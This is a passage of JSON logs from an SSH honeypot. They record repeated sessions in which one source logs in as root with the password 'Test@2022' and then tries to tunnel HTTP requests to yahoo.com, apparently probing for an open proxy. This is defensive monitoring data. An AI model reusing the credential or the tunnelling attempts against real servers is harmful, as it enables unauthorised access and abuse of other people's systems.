{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26102,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dfd6699acf1","protocol":"ssh","message":"New connection: 213.209.150.239:26102 (1.2.3.4:22) [session: 9dfd6699acf1]","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.341409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.342105Z","src_ip":"213.209.150.239","session":"9dfd6699acf1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.398925Z","src_ip":"213.209.150.239","session":"9dfd6699acf1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.680745Z","src_ip":"213.209.150.239","session":"9dfd6699acf1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":22244,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22244","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.738849Z","session":"9dfd6699acf1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.795433Z","src_ip":"213.209.150.239","session":"9dfd6699acf1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16891,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16891","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.950901Z","session":"9dfd6699acf1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.007648Z","src_ip":"213.209.150.239","session":"9dfd6699acf1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.065471Z","src_ip":"213.209.150.239","session":"9dfd6699acf1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26166,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb9e7ec43a08","protocol":"ssh","message":"New connection: 213.209.150.239:26166 (1.2.3.4:22) [session: cb9e7ec43a08]","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.120941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.131229Z","src_ip":"213.209.150.239","session":"cb9e7ec43a08"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.178145Z","src_ip":"213.209.150.239","session":"cb9e7ec43a08"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.460697Z","src_ip":"213.209.150.239","session":"cb9e7ec43a08"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":10319,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10319","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.518545Z","session":"cb9e7ec43a08"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.575313Z","src_ip":"213.209.150.239","session":"cb9e7ec43a08"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":23636,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23636","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.731107Z","session":"cb9e7ec43a08"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.787969Z","src_ip":"213.209.150.239","session":"cb9e7ec43a08"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.845635Z","src_ip":"213.209.150.239","session":"cb9e7ec43a08"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26221,"dst_ip":"1.2.3.4","dst_port":22,"session":"7276a90d659f","protocol":"ssh","message":"New connection: 213.209.150.239:26221 (1.2.3.4:22) [session: 7276a90d659f]","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.901934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.902818Z","src_ip":"213.209.150.239","session":"7276a90d659f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:14.959618Z","src_ip":"213.209.150.239","session":"7276a90d659f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.242188Z","src_ip":"213.209.150.239","session":"7276a90d659f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11500,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11500","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.300120Z","session":"7276a90d659f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.357173Z","src_ip":"213.209.150.239","session":"7276a90d659f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11840,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11840","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.511211Z","session":"7276a90d659f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.567979Z","src_ip":"213.209.150.239","session":"7276a90d659f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.625771Z","src_ip":"213.209.150.239","session":"7276a90d659f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26282,"dst_ip":"1.2.3.4","dst_port":22,"session":"dff2eda41bca","protocol":"ssh","message":"New connection: 213.209.150.239:26282 (1.2.3.4:22) [session: dff2eda41bca]","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.671944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.673041Z","src_ip":"213.209.150.239","session":"dff2eda41bca"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.720282Z","src_ip":"213.209.150.239","session":"dff2eda41bca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:15.955632Z","src_ip":"213.209.150.239","session":"dff2eda41bca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":30416,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30416","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.003889Z","session":"dff2eda41bca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.051254Z","src_ip":"213.209.150.239","session":"dff2eda41bca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22936,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22936","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.189963Z","session":"dff2eda41bca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.237511Z","src_ip":"213.209.150.239","session":"dff2eda41bca"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.285949Z","src_ip":"213.209.150.239","session":"dff2eda41bca"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26326,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f799f889f0d","protocol":"ssh","message":"New connection: 213.209.150.239:26326 (1.2.3.4:22) [session: 2f799f889f0d]","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.332417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.333580Z","src_ip":"213.209.150.239","session":"2f799f889f0d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.380954Z","src_ip":"213.209.150.239","session":"2f799f889f0d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.616715Z","src_ip":"213.209.150.239","session":"2f799f889f0d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11956,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11956","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.664732Z","session":"2f799f889f0d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.712839Z","src_ip":"213.209.150.239","session":"2f799f889f0d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":1529,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1529","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.849617Z","session":"2f799f889f0d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.896912Z","src_ip":"213.209.150.239","session":"2f799f889f0d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.944982Z","src_ip":"213.209.150.239","session":"2f799f889f0d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26374,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ac60349e2cb","protocol":"ssh","message":"New connection: 213.209.150.239:26374 (1.2.3.4:22) [session: 4ac60349e2cb]","sensor":"my-vps","timestamp":"2025-08-26T01:03:16.991183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.000045Z","src_ip":"213.209.150.239","session":"4ac60349e2cb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com",